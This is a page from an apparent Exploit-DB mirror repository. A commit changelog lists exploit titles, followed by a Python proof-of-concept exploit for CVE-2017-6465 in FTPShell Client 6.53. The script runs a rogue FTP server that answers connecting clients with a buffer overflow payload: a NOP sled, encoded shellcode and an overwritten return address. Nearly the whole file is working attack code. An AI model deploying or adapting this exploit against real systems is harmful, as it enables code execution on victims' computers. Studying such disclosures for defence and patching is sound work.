bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/41511.py
Offensive Security 9aef664a7e DB: 2017-03-07 
31 new exploits

iSQL 1.0 - isql_main.c Buffer Overflow (PoC)
iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)
Memcached 1.4.33 - 'Crash' PoC
Memcached 1.4.33 - 'Add' PoC
Memcached 1.4.33 - 'sasl' PoC
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)

Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure
Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure

Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check
Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)

Conext ComBox 865-1058 - Denial of Service

Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)

CyberGhost 6.0.4.2205 - Privilege Escalation

FTPShell Client 6.53 - Buffer Overflow

Linux/x86-64 - /bin/sh Shellcode
Linux/x86-64 - /bin/sh Shellcode (34 bytes)

Linux/x86-64 - Reverse Shell Shellcode
Linux/x86-64 - Reverse Shell Shellcode (134 bytes)

Linux/x86-64 - XOR Encode execve Shellcode
Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)
Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)
Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)
Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)

Linux/x86_64 - Random Listener Shellcode (54 bytes)
Linux/x86-64 - Random Listener Shellcode (54 bytes)

Wordpress < 4.7.1 - Username Enumeration
WordPress < 4.7.1 - Username Enumeration
Advanced Bus Booking Script 2.04 - SQL Injection
Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection
Single Theater Booking Script - 'newsid' Parameter SQL Injection
Responsive Events & Movie Ticket Booking Script - SQL Injection
Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection
Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection
Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection
Naukri Clone Script 3.02 - 'type' Parameter SQL Injection
Yellow Pages Clone Script 1.3.4 - SQL Injection
Advanced Matrimonial Script 2.0.3 - SQL Injection
Advanced Real Estate Script 4.0.6 - SQL Injection
PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection
Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection
PHP Matrimonial Script 3.0 - SQL Injection
MLM Binary Plan Script 2.0.5 - SQL Injection
MLM Forced Matrix 2.0.7 - SQL Injection
MLM Forex Market Plan Script 2.0.1 - SQL Injection
MLM Membership Plan Script 2.0.5 - SQL Injection
Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection
Network Community Script 3.0.2 - SQL Injection
PHP B2B Script 3.05 - SQL Injection
Responsive Matrimonial Script 4.0.1 - SQL Injection
Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection
Select Your College Script 2.01 - SQL Injection
Social Network Script 3.01 - 'id' Parameter SQL Injection
Website Broker Script 3.02 - 'view' Parameter SQL Injection
WordPress Multiple Plugins - Arbitrary File Upload
Deluge Web UI 1.3.13 - Cross-Site Request Forgery
2017-03-07 05:01:20 +00:00

68 lines
2.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing
import socket
import sys
shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
"\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
"\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
"\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
"\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
"\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
"\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
"\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
"\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
"\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
"\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
"\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
"\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
"\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
"\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
"\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
"\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
"\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
"\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
"\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
"\x79\x47\xd8\xc8\x7a\x42")
port = 21
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
# 004b95dc in ftpshell.exe PUSH ESI ; RETN
eip = "\xdc\x95\x4b"
nops = "\x90"*8
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip
while True:
conn, addr = s.accept()
conn.send('220 Welcome to your unfriendly FTP server\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+buffer+'" is current directory\r\n')
Reference in a new issue View git blame Copy permalink